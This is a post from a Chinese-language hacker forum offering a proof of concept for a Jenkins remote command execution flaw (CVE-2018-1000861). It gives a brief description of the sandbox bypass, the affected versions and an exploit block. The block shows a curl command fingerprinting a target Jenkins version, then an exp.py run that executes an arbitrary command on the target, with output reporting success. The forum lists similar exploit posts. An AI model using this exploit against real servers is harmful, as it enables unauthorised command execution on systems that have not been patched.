黑客仓库

最全面知识的黑客论坛，全网最强大的漏洞数据聚合仓库丨黑客网站丨黑客论坛丨暗网丨红队武器库丨渗透测试丨POC/0day/Nday/1day丨网络安全丨黑客攻击丨服务器安全防御丨渗透测试入门丨网络技术交流丨蓝队丨护网丨红队丨欢迎来到黑客仓库，您可以在我们的论坛板块进行交流和学习。

立即注册账号！

POC Jenkins 远程命令执行漏洞

主题发起人 Shacker
开始时间 09 13, 2024

Shacker

黑客倉庫站長

贡献: 21%

09 13, 2024

JavaScript:

## 漏洞概述

Jenkins在沙盒中执行Groovy前会先检查脚本是否有错误，检查操作是没有沙盒的，攻击者可以通过Meta-Programming的方式，在检查这个步骤时执行任意命令。

## 影响范围

```http
Jenkins version < 2.138
```

## EXP

```bash
$ curl -s -I http://jenkins/| grep X-Jenkins
X-Jenkins: 2.137
X-Jenkins-Session: 20f72c2e
X-Jenkins-CLI-Port: 50000
X-Jenkins-CLI2-Port: 50000

$ python exp.py http://jenkins/ 'curl orange.tw'
[*] ANONYMOUS_READ disable!
[*] Bypass with CVE-2018-1000861!
[*] Exploit success!(it should be :P)
```

POC Jenkins 远程命令执行漏洞（CVE-2018-1000861）

POC CVE-2017-1000353

点击展开...

好评 0 否决票

您必须登录或注册才可回复。

	POC Jenkins 远程命令执行漏洞（CVE-2018-1000861） Shacker 09 13, 2024 POC/?Day漏洞数据
	POC Jenkins-CI 远程代码执行漏洞（CVE-2017-1000353） Shacker 09 13, 2024 POC/?Day漏洞数据
	POC Jenkins Shacker 09 13, 2024 POC/?Day漏洞数据
	POC exp远程命令执行漏洞（CVE-2019-0193） Shacker 09 12, 2024 POC/?Day漏洞数据
	POC Solr 远程命令执行漏洞(CVE-2019-0193) Shacker 09 12, 2024 POC/?Day漏洞数据